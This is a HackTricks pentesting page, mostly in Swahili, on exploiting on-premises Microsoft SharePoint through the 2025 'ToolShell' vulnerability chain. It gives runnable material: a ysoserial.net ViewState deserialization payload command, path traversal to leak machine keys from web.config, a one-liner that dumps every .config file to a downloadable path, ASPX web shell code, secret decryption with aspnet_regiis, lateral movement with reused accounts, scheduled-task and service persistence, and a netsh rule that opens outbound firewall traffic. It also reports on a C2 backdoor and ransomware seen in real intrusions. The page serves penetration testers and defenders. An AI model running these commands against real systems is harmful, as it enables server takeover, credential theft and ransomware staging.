Microsoft SharePoint – Pentesting & Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Microsoft SharePoint (on-premises) imejengwa juu ya ASP.NET/IIS. Sehemu kubwa ya uso wa kawaida wa mashambulizi wa web (ViewState, Web.Config, web shells, n.k.) kwa hivyo ipo, lakini SharePoint pia inakuja na mamia ya kurasa za ASPX za kibiashara na web services ambazo zinaongeza kwa kiasi kikubwa uso wa mashambulizi unaoonekana. Ukurasa huu unakusanya mbinu za vitendo za kuorodhesha, exploit na kudumu ndani ya mazingira ya SharePoint kwa msisitizo wa mnyororo wa 2025 wa exploit uliofunuliwa na Unit42 (CVE-2025-49704/49706/53770/53771).

1. Uorodhesho wa haraka

# favicon hash and keywords
curl -s https://<host>/_layouts/15/images/SharePointHome.png
curl -s https://<host>/_vti_bin/client.svc | file -  # returns WCF/XSI

# version leakage (often in JS)
curl -s https://<host>/_layouts/15/init.js | grep -i "spPageContextInfo"

# interesting standard paths
/_layouts/15/ToolPane.aspx               # vulnerable page used in 2025 exploit chain
/_vti_bin/Lists.asmx                     # legacy SOAP service
/_catalogs/masterpage/Forms/AllItems.aspx

# enumerate sites & site-collections (requires at least Anonymous)
python3 Office365-ADFSBrute/SharePointURLBrute.py -u https://<host>

2. 2025 exploit chain (a.k.a. β€œToolShell”)

2.1 CVE-2025-49704 – Code Injection on ToolPane.aspx

/_layouts/15/ToolPane.aspx?PageView=…&DefaultWebPartId=<payload> inaruhusu msimbo yeyote wa Server-Side Include kuingizwa kwenye ukurasa ambao baadaye unasanywa na ASP.NET. Mshambuliaji anaweza kuweka C# inayotekeleza Process.Start() na kuacha ViewState hatarishi.

2.2 CVE-2025-49706 – Improper Authentication Bypass

Ukurasa huo huo unaamini header X-Forms_BaseUrl ili kubaini muktadha wa tovuti. Kwa kuielekeza kwa /_layouts/15/, MFA/SSO iliyowekwa kwenye tovuti ya mzizi inaweza kupitishwa bila uthibitisho.

2.3 CVE-2025-53770 – Unauthenticated ViewState Deserialization β†’ RCE

Mara mshambuliaji anapodhibiti gadget ndani ya ToolPane.aspx wanaweza kutuma thamani ya __VIEWSTATE isiyo sainiwa (au MAC-only) inayosababisha deserialization ya .NET ndani ya w3wp.exe na kusababisha utekelezaji wa msimbo.

Iwapo kusaini kumewezeshwa, iba ValidationKey/DecryptionKey kutoka kwa web.config yoyote (angalia 2.4) na unda payload kwa kutumia ysoserial.net au ysodom:

ysoserial.exe -g TypeConfuseDelegate -f Json.Net -o raw -c "cmd /c whoami" |
ViewStateGenerator.exe --validation-key <hex> --decryption-key <hex> -o payload.txt

For an in-depth explanation on abusing ASP.NET ViewState read:

Exploiting __VIEWSTATE without knowing the secrets

2.4 CVE-2025-53771 – Path Traversal / web.config Disclosure

Kutuma parameter Source iliyotengenezwa kwa ToolPane.aspx (kwa mfano ../../../../web.config) huirudisha faili iliyolengwa, allowing leakage of:

  • <machineKey validationKey="…" decryptionKey="…"> ➜ forge ViewState / ASPXAUTH cookies
  • connection strings & secrets.

2.5 ToolShell workflow observed in Ink Dragon intrusions

Check Point ilibainisha jinsi Ink Dragon ilivyoweka mnyororo wa ToolShell kufanya kazi miezi kabla Microsoft ilipotolewa marekebisho:

  • Header spoofing for auth bypass – mshambuliaji hutuma POSTs kwa /_layouts/15/ToolPane.aspx akiwa na Referer: https://<victim>/_layouts/15/ pamoja na bandia X-Forms_BaseUrl. Vichwa hivyo huvishawishi SharePoint kwamba ombi linatoka kwenye layout ya kuaminiwa na kuruka kabisa front-door authentication (CVE-2025-49706/CVE-2025-53771).
  • Serialized gadget in the same request – body ina data ya ViewState/ToolPart yenye udhibiti wa mshambuliaji ambayo inafika kwenye server-side formatter iliyo vunja (CVE-2025-49704/CVE-2025-53770). Payload kawaida ni mnyororo wa ysoserial.net unaoendesha ndani ya w3wp.exe bila kugusa diski.
  • Internet-scale scanning – telemetry ya July 2025 inaonyesha wao wakiorodhesha kila endpoint inayoweza kufikiwa /_layouts/15/ToolPane.aspx na kuirudia kamusi ya leaked <machineKey> pairs. Tovuti yoyote iliyonakili sample ya validationKey kutoka kwenye nyaraka inaweza kutekwa hata kama imepangwa patch kikamilifu (angalia ukurasa wa ViewState kwa signing workflow).
  • Immediate staging – exploitation iliyofanikiwa huangusha loader au PowerShell stager ambayo: (1) inadump kila web.config, (2) inaweka ASPX webshell kwa upatikanaji wa dharura, na (3) inapanga Potato privesc ya ndani ili kutoroka IIS worker.

3. Post-exploitation recipes observed in the wild

3.1 Exfiltrate every .config file (variation-1)

cmd.exe /c for /R C:\inetpub\wwwroot %i in (*.config) do @type "%i" >> "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug_dev.js"

The resulting debug_dev.js can be downloaded anonymously and contains all sensitive configuration.

3.2 Weka Base64-encoded ASPX web shell (variation-2)

powershell.exe -EncodedCommand <base64>

Mfano wa payload iliyotafsiriwa (ilifupishwa):

<%@ Page Language="C#" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
Response.Write(MachineKey.ValidationKey);
// echo secrets or invoke cmd
}
</script>

Imeandikwa kwa:

C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

The shell exposes endpoints to kusoma / kuzungusha funguo za mashine which allows forging ViewState and ASPXAUTH cookies across the farm.

3.3 Tofauti iliyofichwa (variation-3)

Shell ile ile lakini:

  • imewekwa chini ya ...\15\TEMPLATE\LAYOUTS\
  • majina ya vigezo yamepunguzwa hadi herufi moja
  • Thread.Sleep(<ms>) imeongezwa kwa ajili ya sandbox-evasion & timing-based AV bypass.

3.4 AK47C2 multi-protocol backdoor & X2ANYLOCK ransomware (iliyoshuhudiwa 2025-2026)

Uchunguzi wa hivi karibuni wa incident-response (Unit42 β€œProject AK47”) unaonyesha jinsi watamizi wanavyotumia mnyororo wa ToolShell baada ya initial RCE kupeleka implant ya C2 yenye njia mbili na ransomware katika mazingira ya SharePoint:

AK47C2 – dnsclient tofauti

  • Seva ya DNS iliyowekwa kwa kudumu: 10.7.66.10 inayozungumza na domain yenye mamlaka update.updatemicfosoft.com.
  • Ujumbe ni vitu vya JSON vilivyofichwa kwa XOR kwa kutumia funguo ya statiki VHBD@H, zimekodishwa kwa hex na zimeingizwa kama sub-domain labels.
{"cmd":"<COMMAND>","cmd_id":"<ID>"}
  • Maulizo marefu hugawanywa vipande na huwa na kiambishi awali s, kisha yanakusanywa tena upande wa seva.
  • Seva hurudisha majibu katika rekodi za TXT zenye kanuni ile ile ya XOR/hex:
{"cmd":"<COMMAND>","cmd_id":"<ID>","type":"result","fqdn":"<HOST>","result":"<OUTPUT>"}
  • Toleo 202504 lilileta muundo uliorahisishwa <COMMAND>::<SESSION_KEY> na alama za vipande 1, 2, a.

AK47C2 – httpclient tofauti

  • Inatumia tena JSON & taratibu za XOR zilizo sawa lakini inatuma blob ya hex ndani ya HTTP POST body kupitia libcurl (CURLOPT_POSTFIELDS, nk.).
  • Mtiririko wa kazi/matokeo ule ule unaoruhusu:
  • Utekelezaji wa amri yoyote ya shell.
  • Muda wa kulala unaobadilika na maagizo ya kill-switch.

X2ANYLOCK ransomware

  • Payload ya 64-bit C++ inayoandikwa kupitia DLL side-loading (ona chini).
  • Inatumia AES-CBC kwa data za faili + RSA-2048 kufunika ufunguo wa AES, kisha inaongeza nyongeza .x2anylock.
  • Inafanya encryption kwa urudufu kwenye diski za ndani na SMB shares zilizogunduliwa; inaepuka njia za mfumo.
  • Inaacha noti ya clear-text How to decrypt my data.txt ikijumuisha Tox ID ya statiki kwa mazungumzo.
  • Ina kill-switch ya ndani:
if (file_mod_time >= "2026-06-06") exit(0);

DLL side-loading chain

  1. Mvamizi anaandika dllhijacked.dll/My7zdllhijacked.dll kando ya 7z.exe.
  2. SharePoint-spawned w3wp.exe inazindua 7z.exe, ambayo inachukua DLL ya hatari kutokana na mpangilio wa utafutaji wa Windows, ikiwaita entrypoint ya ransomware katika kumbukumbu.
  3. Loader tofauti wa LockBit ulioshuhudiwa (bbb.msi ➜ clink_x86.exe ➜ clink_dll_x86.dll) huondoa usimbaji wa shell-code na hufanya DLL hollowing ndani ya d3dl1.dll kuendesha LockBit 3.0.

[!INFO] ID ile ile ya Tox ya statiki iliyopatikana katika X2ANYLOCK inaonekana pia katika leaked LockBit databases, ikionyesha muingiliano wa affiliates.

3.5 Kubadilisha mali za SharePoint kuwa harakati za lateral

  • Decrypt every protected section – mara tu umeweka nafasi kwenye web tier, tumia mbaya aspnet_regiis.exe -px "connectionStrings" C:\\temp\\conn.xml -pri (au -px "appSettings") kuchoma siri za clear-text zinazojificha nyuma ya <connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">. Ink Dragon mara kwa mara alikusanya SQL logins, SMTP relays na cheti za huduma maalum kwa njia hii.
  • Recycle app-pool accounts across farms – mashirika mengi hurudisha kutumia akaunti ile ile ya domain kwa IIS APPPOOL\SharePoint kwenye kila front-end. Baada ya kufungua identity impersonate="..." blocks au kusoma ApplicationHost.config, jaribu cheti kwa SMB/RDP/WinRM kwa kila seva jirani. Katika matukio mengi akaunti hiyo pia ilikuwa local administrator, ikiruhusu psexec, sc create, au scheduled-task staging bila kusababisha password sprays.
  • Abuse leaked <machineKey> values internally – hata kama perimeter ya intaneti itapewa patches, kutumia tena validationKey/decryptionKey ile ile kunaruhusu lateral ViewState exploitation kati ya maeneo ya ndani ya SharePoint yanayomwamini mmoja mwingine.

3.6 Mifumo ya kudumu iliyoshuhudiwa katika uvamizi wa 2025

  • Scheduled tasks – kazi ya mara moja inayoitwa SYSCHECK (au majina mengine yenye mandhari ya afya) huundwa kwa /ru SYSTEM /sc once /st <hh:mm> ili kuanzisha loader ya hatua inayofuata (kawaida conhost.exe iliyojulikana upya). Kwa sababu inaendeshwa mara moja, telemetry mara nyingi haisioni isipokuwa XML ya kazi ya kihistoria itahifadhiwa.
  • Masqueraded services – huduma kama WindowsTempUpdate, WaaSMaintainer, au MicrosoftTelemetryHost zinasakinishwa kupitia sc create zikielekeza kwenye saraka ya sideloading triad. Binaries zinabaki na saini zao za asili za AMD/Realtek/NVIDIA lakini zimebadilishwa majina ili kuendana na vipengele vya Windows; kulinganisha jina kwenye diski na uwanja wa PE OriginalFileName ni ukaguzi wa haraka wa uadilifu.

3.7 Kupunguza vizingiti vya firewall ya mwenyeji kwa trafiki ya relay

Ink Dragon mara kwa mara inaongeza kanuni ya outbound inayoruhusu inayojificha kama matengenezo ya Defender ili trafiki ya ShadowPad/FinalDraft iweze kutoka kwenye bandari yoyote:

netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any

Kwa sababu sheria ilitengenezwa kwa ndani (si kupitia GPO) na inatumia binary halali ya Defender kama program=, misingi mingi ya SOC huipuuza, lakini inafungua Any ➜ Any egress.

Triki zinazohusiana

  • IIS post-exploitation & web.config abuse:

IIS - Internet Information Services

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks